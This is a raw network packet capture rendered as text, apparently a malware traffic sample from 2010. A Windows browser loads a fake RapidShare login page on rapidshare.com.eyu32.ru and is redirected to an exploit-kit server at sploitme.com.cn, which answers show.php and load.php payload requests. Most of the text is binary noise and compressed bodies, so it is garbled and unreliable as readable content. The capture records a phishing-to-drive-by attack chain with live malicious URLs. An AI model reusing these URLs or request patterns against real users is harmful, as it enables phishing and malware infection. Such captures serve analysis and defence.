ò;=K VV'DEHR8TDC4k$R'DcSc5t='D 8fd12edd2dc1462<MSFT 5.07 ,./!+;=K NN'DRT5E@@`  CD,;$$R  'DcSc5  3Q6 ;=K pp'DEbS89DCN$R'DcSc5='D2 6  8fd12edd2dc1462Q8fd12edd2dc1462.<MSFT 5.07 ,./!+;=Ka NN'DRT5E@@`  CD,,$R   'DcSc5  3Q6 ;=K6 <<'D'D  ;=K<<'D'D  $R;=K<<'D'D  $R ;=KYnn'DE`V *  Lou) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA    ;=K)<<^'DF(W7T " ;=KŞRR'DRT5ED   F(W7T " ;=KZ nn'DE`Y '  Lou) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA    ;=K.<<^'DF(Z7Q " DIEGE ;=KRR'DRT5ED   F(Z7Q "!;=Knn'DE`[ %  Lou) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ";=K[nn'DE`\ $  Lpu( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   #;=Krnn'DE`] #  Lr) FHEPFCELEHFCEPFFFACACACACACACAAA   #;=K nn'DE`_ !  Lr) FHEPFCELEHFCEPFFFACACACACACACAAA   $;=K3 nn'DE``  Lr) FHEPFCELEHFCEPFFFACACACACACACAAA   %;=K,knn'DE`a   Lr( FHEPFCELEHFCEPFFFACACACACACACAAA   %;=KA<<'D'D  %;=K**'DRT5RT5 'D %;=K">>RT5'DE0j@t 82'P p{%;=K ::'DRT5E,@u82 P' `Y%;=K+%<<RT5'DE(k@{ 82'P P.%&;=KiRT5'DEl@ 82'P P*GET /login.php HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive &;=K>766'DRT5E(@u82 P' NP'&;=KV'DRT5E@p982 P' NP'ZHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:12 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1508 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Vmo6_jl![ǒI 5)-֒RT7QcC ~ɻ{Ew :ys޽!n5e88D7%S8_,dw<j:HTbŝP]edJ[׃?r 'I#maJqw:BTFX:Œ;YtRbz Tad]b5ㅢro6Z4RNyF-.u&2H+VH,JhR,&eiTEd/ie ̀[ӄa!_O<7>a>^-^pΓ j)[UA>Oҹ9q%UUO&;s둈؉k%!փ B6 푃9!jag@RpОosNYt>Ff=]Eͣ[0~|83}K0%aCx4k.D^ˮӯ%J~^ٳ>;==o?}dO>X{ܣ33'oW } C{ac З :CE9ΰ%P'[Ԛ9Xc r+/=gs?ѡz4ңW:HCsP/tJupONL%STW- TRHGzh'?禗 &;=K ^<<RT5'DE(m@y 82'P N P%&;=K8nn'DE`p   Loq ) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   &;=Kvnn'DE`q   Lo!) FHEPFCELEHFCEPFFFACACACACACACABO   &;=K%%RT5'DEt@ 82'P N PGET /images/sslstyles.css HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/login.php If-Modified-Since: Tue, 02 Feb 2010 17:38:05 GMT If-None-Match: "5e472-fef-47ea19070f940" &;=K66'DRT5E(@u82 P' =P&;=K'DRT5E @t82 P' =P[HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:05:12 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=99 ETag: "5e472-fef-47ea19070f940" &;=KfRT5'DEy@ 82'P=PGET /images/images/dot.jpg HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/images/sslstyles.css &;=K866'DRT5E( @u82 P'P&;=K7yy'DRT5Ek @s82 P'PŶHTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:05:12 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 276 Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPMO@WNH4lP Bql ݖx{3o^vV~9,˷5j1*/r~d,E7#p훣HbN`c<,Lh pިsv"Jx'JM`'`y wmx$Qu%8vE*e9Jf,cpۇև;(>Fj:@MNqu;."`eW+%V9>RT5'DE0@[ 84(PIoyp&;=KQJ::'DRT5E, @u84 P( Ioz`&;=K0M<<RT5'DE(@_ 84(PIoz P&;=KTRT5'DE@ 84(PIoz PIaGET /?click=3feb5a6b2f HTTP/1.1 Host: sploitme.com.cn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/login.php &;=K22RT5'DE$@\ 82'PEPGET /images/rslogo.jpg HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/login.php If-Modified-Since: Tue, 02 Feb 2010 10:31:49 GMT If-None-Match: "5e46b-6825-47e9b9bfe2f40" &;=K66'DRT5E( @u84 P( Io/P&;=K 66'DRT5E(@u82 P'EP&;=K~>>RT5'DE0@C 82)P핗p&;=Kc>>RT5'DE0@B 82*Pspc&;=K'DRT5E@s84 P( Io/PHTTP/1.1 302 Found Date: Tue, 02 Feb 2010 19:05:12 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Location: http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html &;=Kf'DRT5E @t82 P'EP_yHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:05:12 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=97 ETag: "5e46b-6825-47e9b9bfe2f40" &;=Kd::'DRT5E,@u82 P* s``&;=K::'DRT5E,@u82 P) 핗`Qo&;=K}<<RT5'DE(@I 82*Ps P,&;=K<<RT5'DE(@H 82)P핗 Pn;&;=KRT5'DE@ 82*Ps P.GET /images/images/terminator_back.png HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/images/sslstyles.css &;=K66'DRT5E(@u82 P* uPc&;=KRT5'DE@ 82)P핗 P6GET /images/images/terminatr_back.png HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/images/sslstyles.css &;=K66'DRT5E(@u82 P) 학[Pgs&;=KRT5'DE@ 84(PIo/ P8GET /fg/show.php?s=3feb5a6b2f HTTP/1.1 Host: sploitme.com.cn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://rapidshare.com.eyu32.ru/login.php &;=K66'DRT5E(@u84 P( IoP/&;=KĚ'DRT5Eu@s82 P* uPHTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:05:13 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 285 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPN0+Po Ɋ}J =pBn㤪eW3;Y~5{Vz5q5jvl8  H*ƣ1llFr<~f&;=Kl<<RT5'DE(@4 82'P(P&;=K]'DRT5E@p%84 P( IoPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:13 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1666 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html WksFLckvWOlCû ---8HA${]B>!HwsGӫ7<|ӹsw;#ϻ{8aOwgWvx=oE;U~\dM}X]g^WmQnUQVne.f8ֹUog7qꉻa}N ްw2;XNS8r=xYo'o7Ya&8\,©+]gS4E3z'yS:|Yd{iT6{ļ:]9g\VymkE2/_͵oܼu{<=xO??%?O^7v{3_iQ/ y}T\[ly[UN{mכmjbdjEs1\/3"~2YMqE_љ?J_ ^x/߼s'oVSk.er?#.㱔F9z/ם016_cgcҔt|ҳY : 4f6rj38BgWe/x\\ݫY@?kW\3a3_nE oOIS@UɇeOjf[ďzDw? h.ݾ<3"fYT=p0|(֛|Rց Oi([>PX~H;hLQfo. +zCv3KE™-l^VE-ixƆ®+Ťʁ#/.}9T^l-~;f}Ͼˑ>(̛R]Vj/uo/TD$F4TaLH%R1ُT(U_80IBIBTViTEkU+ߨC5FOWi8 * 0Sǿ~OPa GZ>RHHUC 6L$J+bRax%""681&;=K'DRT5E@sg84 P( ˆIoP0LH,C@[YĮ H?6 SaD/ď&D킔4=`!0"PVӤЗ:j)rg`  A`lp`! IɃCA)/BO{#JXP5cDPsyi`"hF%u[$iC:* ވBERk؈fu0|oIbs"ieE>> Kpj(C:A] --iY#mk@:4`|WQ/KdI R,$cfvJN"#m *Bq PP*o+e,(s#D6,wY,"2$B[qRr= 6P8v/K/ 9dkE\g{2/ &VKw[B6 uiL%d yHne&+_?fv6/ ijQV P.dM"6T qyQ5fذncuY8#6"2)z9f7%y'"yV,AtqnP5LBgP-@:_+;7cUwSq!~~ $1 &;=K<<RT5'DE(@1 84(PIo P1&;=K<<RT5'DE(@0 82*Pu OPr&;=K <<RT5'DE(@/ 82)P학[ OPl&;=KФ RT5'DE@ 82'P(PjGET /favicon.ico HTTP/1.1 Host: rapidshare.com.eyu32.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive &;=Kr 66'DRT5E(@u82 P'(MPo&;=K uu'DRT5Eg@s82 P'(MP;HTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:05:13 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 272 Keep-Alive: timeout=15, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPj0+9h] -A;$&=*ꑐPe`fgvwn|% ,a6Gܔ h$#)b*:2$x폒i[aeB/(Ąd{#cDЁ5J?A:/ugz.AC1'YZBq\+coČd}}xz]s,LRNp^WP~^sE6A 3'")#6@mXr oI~JQ&;=K <<RT5'DE(@' 82'PMgP?&;=K0 nn'DE`  Loq ) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   &;=KP3 nn'DE`  Lo!) FHEPFCELEHFCEPFFFACACACACACACABO   ';=KRT nn'DE`  Loq ) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   ';=KxW nn'DE`  Lo!) FHEPFCELEHFCEPFFFACACACACACACABO   (;=K9nn'DE`  Lpq ( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   (;=K5nn'DE`  Lo!( FHEPFCELEHFCEPFFFACACACACACACABO   );=K>'DEB  | "  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462);=K<'DE2  M #  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA FHEPFCELEHFCEPFFFACACACACACACABNSMB%!!V2\MAILSLOT\BROWSE8FD12EDD2DC1462U*;=Klf 'DE?  | %  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462,;=K9'DE>  | &  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462-;=K9<<RT5'DE(@ 82'PMgP>-;=K49<<RT5'DE(@ 82*Pu OPq-;=K966'DRT5E(@u82 P'gNP/-;=K966'DRT5E(@u82 P* OuP-;=Kq><<RT5'DE(@ 82)P학[ OPl-;=K>66'DRT5E(@u82 P) O학\Pe%-;=K?<<RT5'DE(@ 84(PIo P0-;=K?66'DRT5E(@u84 P( IoP !-;=KoC66'DRT5E( @u82 P) O학\Pe$-;=K"F66'DRT5E(!@u82 P* OuP-;=KH66'DRT5E("@u82 P'gNP.-;=KGJ<<RT5'DE(@ 82)P학\ PPl-;=KrK<<RT5'DE(@ 82*Pu PPp-;=K0L<<RT5'DE(@ 82'PNhP=-;=KS66'DRT5E(#@u84 P( IoP -;=KW<<RT5'DE(@ 84(PIo P/-;=K 'DE$  |'  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462/;=Ka'DE  μ(  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC14620;=K'DE  μ)  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC14621;=K'DE  μ*  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC14622;=K 'DE  μ+  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC1462;;=K VV' EH7DC4' cSc5t='  8fd12edd2dc1462<MSFT 5.07 ,./!+;;=Kߗ NN' RT5E@@^  CD,w[  ' cSc5  3Q6 ;;=K; pp' Eb7DCNV' cSc5=' 2 6  8fd12edd2dc1462Q8fd12edd2dc1462.<MSFT 5.07 ,./!+;;=K NN' RT5E@@^  CD,gL   ' cSc5  3Q6 ;;=K <<' '   <;=Kc<<' '   =;=Kr<<' '   >;=Knn' E`  Llc0) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   >;=K<<^' F(5 ">;=KRR' RT5ED   F(5 ">;=K(nn' E`  Llc0) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ?;=K<<^' F(5 " DIEGE?;=KpRR' RT5ED   F(5 "?;=K\ nn' E`  Llc0) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   @;=Knn' E`  Lmc0( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   A;=Kڽnn' E`  L`1) FHEPFCELEHFCEPFFFACACACACACACAAA   A;=K3nn' E`  L`1) FHEPFCELEHFCEPFFFACACACACACACAAA   B;=K0g nn' E`  L`1) FHEPFCELEHFCEPFFFACACACACACACAAA   C;=K+nn' E`  L`1( FHEPFCELEHFCEPFFFACACACACACACAAA   D;=K?nn' E`  Ll_2) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   D;=Knn' E`  L]3) FHEPFCELEHFCEPFFFACACACACACACABO   D;=KA<<' '   D;=KD**' RT5RT5 '  D;=K>RT5' E0@ 828Pa-p=D;=KN::' RT5E,@t82 P8 a-`D;=Kj<<RT5' E(@ 828Pa- P*D;=K5xffRT5' EX@ 828Pa- PGET /login.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive D;=Kx66' RT5E(@t82 P8 a.OP$D;=Kt' RT5E@o-82 P8 a.OP'HTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1508 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Vmo6_jl![ǒI 5)-֒RT7QcC ~ɻ{Ew :ys޽!n5e88D7%S8_,dw<j:HTbŝP]edJ[׃?r 'I#maJqw:BTFX:Œ;YtRbz Tad]b5ㅢro6Z4RNyF-.u&2H+VH,JhR,&eiTEd/ie ̀[ӄa!_O<7>a>^-^pΓ j)[UA>Oҹ9q%UUO&;s둈؉k%!փ B6 푃9!jag@RpОosNYt>Ff=]Eͣ[0~|83}K0%aCx4k.D^ˮӯ%J~^ٳ>;==o?}dO>X{ܣ33'oW } C{ac З :CE9ΰ%P'[Ԛ9Xc r+/=gs?ѡz4ңW:HCsP/tJupONL%STW- TRHGzh'?禗 D;=K[<<RT5' E(@ 828Pa.O P"D;=K RT5' E@i 828Pa.O P]GET /images/sslstyles.css HTTP/1.1 Accept: */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Tue, 02 Feb 2010 10:31:49 GMT If-None-Match: "5e46c-1061-47e9b9bfe2f40" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive D;=Kʏ 66' RT5E(@t82 P8 a/PD;=K) ' RT5E @o*82 P8 a/P]%HTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Last-Modified: Tue, 02 Feb 2010 17:38:05 GMT ETag: "5e472-fef-47ea19070f940" Accept-Ranges: bytes Content-Length: 4079 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/css body { margin: 0; padding: 0; color: white; background: url(./images/dot.jpg); font: 9pt Arial, sans-serif; } #wrapper { background: #ffffff; color: black; margin: 20px auto 0 auto; padding: 0px; border: 1px solid #000000; width: 900px; } #footer { font-size: 10px; text-align: center; margin: 10px auto 10px auto; } #terminator { background: url(./images/terminator_back.png) repeat-x; height: 15px; margin: 0 0 0 0; border: 0; } #header { border-bottom: 1px solid #000000; margin: 0px; height: 185px; } #header .left { background: #ACC4CE url(./images/back_left.jpg); width: 100px; float: left; height: 136px; margin: 0px; } #header .right { background: #ACC4CE url(./images/back_right.jpg); width: 800px; float: left; margin: 0x; height: 136px; padding: 0px; } #header-bottom { border-top: 0; border-bottom: 0; background: #ffffff; margin: 0 0 0 0; } #main { position: relative; margin: 10px; } #content { margin: 0 0 0 0; border-style: none; border-width: 0 0px 0px 0; background: white; color: black; } #content .inner { margin: 0px 0px 0px 0px; } #content .inner a { color: #0B7D;=K~ ' RT5E @o)82 P8 Ԏa/PBCC; text-decoration: underline; } #content .inner a:hover { color: #0B7BCC; text-decoration: none; } #content .inner h2 { color: #245185; padding-bottom: 0.2em; border-bottom: 1px solid #b9d2e3; font-size: 120%; } #content .inner h3 { font-size: 130%; } #content .inner p { color: #666666; font-size: 100%; } #content .inner hr { background-color: #444444; height: 1px; margin: 2px; border: 0; } #content .inner textarea { font-size:9px; font-family:Verdana, Arial, Helvetica, sans-serif; } ul.dropdown { list-style: none; margin:0; padding:0; width:100%; } ul.dropdown * ul { list-style: none; margin:0; padding: 0; display:none; position:absolute; z-index:99; } ul.dropdown li { float: left; padding: 0px; /* padding: 2px; helps Opera with hover */ } ul.dropdown li * li { float: none; position: relative; } ul.dropdown ul * ul { left:98%; top:0; width:100%; } ul.dropdown a { display:block; } ul.dropdown ul * a { width:20em; } ul.dropdown li:hover ul ul, ul.dropdown li:hover ul ul ul, ul.dropdown li:hover ul ul ul ul { display:none; } ul.dropdown li:hover ul, ul.dropdown ul li:hover ul, ul.dropdown ul ul li:hover ul { display:block; } ul.dropdown a { background-color: #666666; color: #fff; padding: 2px 9px 2px 9px; text-decoration: none; } ul.dropdown a:hover { background-color: #444; color: #fff; } ul.dropdown ul { border: 0; background-color: #ccc; } ul.dropdown ul a { background-color: #ccc; coloD;=K ' RT5E @oL82 P8 ֈa/Plpr: #000; padding: 4px; text-decoration: none; } ul.dropdown ul a:hover { background-color: #E1E1E1; color: #000; } ul.dropdown ul li { background-color: #ccc; } ul.dropdown hr { background-color: #444444; height: 1px; margin: 3px; border: 0; } #mainmenu { background: url(./images/terminatr_back.png) #666666 repeat-x; height: 20px; } input, textarea { margin-right: 10px; margin-top: 4px; font: normal 11px verdana, arial, geneva, helvetica, sans-serif; } form { line-height: 150%; } #uploadfield { margin: 20px auto 10px auto; padding: 0px; width: 800px; } #premiumloginform { margin: 20px auto 10px auto; padding: 0px; width: 200px; } #freefoldersform { margin: 20px auto 10px auto; padding: 0px; width: 540px; } #premiumtable { border-left: 1px solid #BFBFBF; border-bottom: 1px solid #BFBFBF; margin: 20px auto 10px auto; padding: 0px; width: 600px; } #premiumtable2 { border-left: 1px solid #BFBFBF; border-bottom: 1px solid #BFBFBF; margin: 20px auto 10px auto; padding: 0px; width: 700px; } #premiumtable td { border-right: 1px solid #BFBFBF; border-top: 1px solid #BFBFBF; } #premiumtable2 td { border-right: 1px solid #BFBFBF; border-top: 1px solid #BFBFBF; } #content .inner .resellergroup { color: #245185; padding: 10px; border-top: 2px solid #cccccc; font-size: 120%; font-weight: bold; margin: 10px; } #content .inner .resellergroup .reseller { color: #666666; fD;=K` <<RT5' E(@ 828Pa/ ֈPD;=K <<RT5' E( @ 828Pa/ P`D;=K% ww' RT5Ei @t82 P8 a/Pont-size: 90%; margin: 10px 10px 20px; font-weight: normal; } D;=K <<RT5' E( @ 828Pa/ YPD;=KX >>RT5' E0 @ 849PT/>pD;=K ::' RT5E, @t84 P9 T/?`KD;=K RT5' E @e 828Pa/ YPGET /images/rslogo.jpg HTTP/1.1 Accept: */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Tue, 02 Feb 2010 10:31:49 GMT If-None-Match: "5e46b-6825-47e9b9bfe2f40" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive D;=Kf 66' RT5E(@t82 P8 Ya1:P eD;=Kv <<RT5' E(@ 849PT/? PhwD;=KN ' RT5E @s82 P8 Ya1:PM%HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:05:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=98 ETag: "5e46b-6825-47e9b9bfe2f40" D;=K QQRT5' EC@ 828Pa1: >RT5' E0@ 82:PyP:pD;=K ::' RT5E,@t82 P: yP;`D;=K <<RT5' E(@ 82:PyP; PD;=KP yy' RT5Ek@r82 P8 Fj:@MNqu;."`eW+%V9fD;=K' RT5Et@r82 P8 a3|PM7HTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:05:43 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 285 Keep-Alive: timeout=15, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPN0+Po Ɋ}J =pBn㤪eW3;Y~5{Vz5q5jvl8  H*ƣ1llFr<~{9:~G_??{L&Gz'qbb>{7rl>^=YmNW|_˧of$F6V˧(w'\wOn=%ɵ'/O>M'Wo_<4͟YyF̮FKY KVbq5_ׇǓ粢yu^<ߌ.g|ً٧oql=z?Z/g:哝/f<|{ɧ?gON/_}}lz7~S.tgtttX-wכ+auӝ#uzyi<x}1uG\gt;>;_}1b蛋|wq_Η盋+?MC3lfw7a?sN0t;?>[89IwIݨw(74@'óCP< }sZ~kQ^=J~y9k_*vh=. CG~mrq3vE"n{{pv 8>+7}r˫H^==ݏaӂd]ޗVHE;=KZs' RT5E@o84 P9 ŒT2 Pg"UO+ɗb["RPC/%I)-߹$P\?Kn3AX#qpz!o vԋ~YOUp$fu6^u\fBZ >sg,T "~hN ȰUS:xʫ/5Ȋ r0cȰSd¸(OiAx\VWw7 MG \- ,C"bV6qb qWg,;F(W E4x!hy xqVedf,GVnD@FE;=Ks' RT5E@o984 P9 FT2 PHn( l۳ib9 ŏYGA/Kn8TXX!ʬnK$ma&zg}زQVTfyߝx͛֍L"S/S &%}P6(ѱW:SZ` Gz=o,P7' eKF2(FPCpM$m,;jI6ZJȌȇ{aWc(kE) . &wcYalQ4XPVdVh 4W_({9B=V~9uvtAuѫEx-IEoDQ's&5z#Cn IHֽ.^%ȆrVGyVס|ڐa2z2U^l: 1Y+p6}hrB.UȽUr *P0z}_eY} ?eYpkgDЋ8A*-Z;/'3Kym3isy3&!*7ԽHߚYaF^O%*hSNjUcf&uc g%'=KRMhEVcMۉJJlhPýU9,klÔ3r" $էdQP!gΎ*m$6fmVX}A"8h"ڙ3 sZ~2sfljpeX`Llˍ0sa*2MZL6ugo9![kc:_8Y%p68Cg7c2'0PJ`d,#N+^%Va'_XGa.JY})6` FCu˜:xP'/$ΐlB!ʢ0:؁٭)Kꌣ`yEmF+5P=A'v٬3YC02 >d;US&WA$8r/̆E1+R쐧]Q'휣4pg| B'B4shc!T֙c3,1`N)kd_q-ABpثPa=ltfc=cy0G{dl͕*DpbCiq(oaH{$Z_/FeL2 F&48k idrki 8%ϓOyη`qlo9;5G5/x~o%Js.ga!ͱ&Qmjl=kcq aZ'}|k74fsE;=K<<RT5' E( @ 849PT2 FPXfE;=K<<RT5' E(!@ 849PT2 P`XfE;=KLL' RT5E>@r84 P9 T2 P!lR=pVp櫉RF/eo{Vatц9Ӎ9ͩZuaq`X5%%d%Ryg<>zdrpi%uǓW<pO"]*E;=K0<<RT5' E("@ 849PT2 PPE;=K nn' E`#]  Ll_2) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   E;=KK nn' E`$\  L]3) FHEPFCELEHFCEPFFFACACACACACACABO   F;=KJJRT5' E<%@ 849PT2 PZGET /fg/load.php?e=1 HTTP/1.1 Accept: */* Accept-Language: en-us Referer: 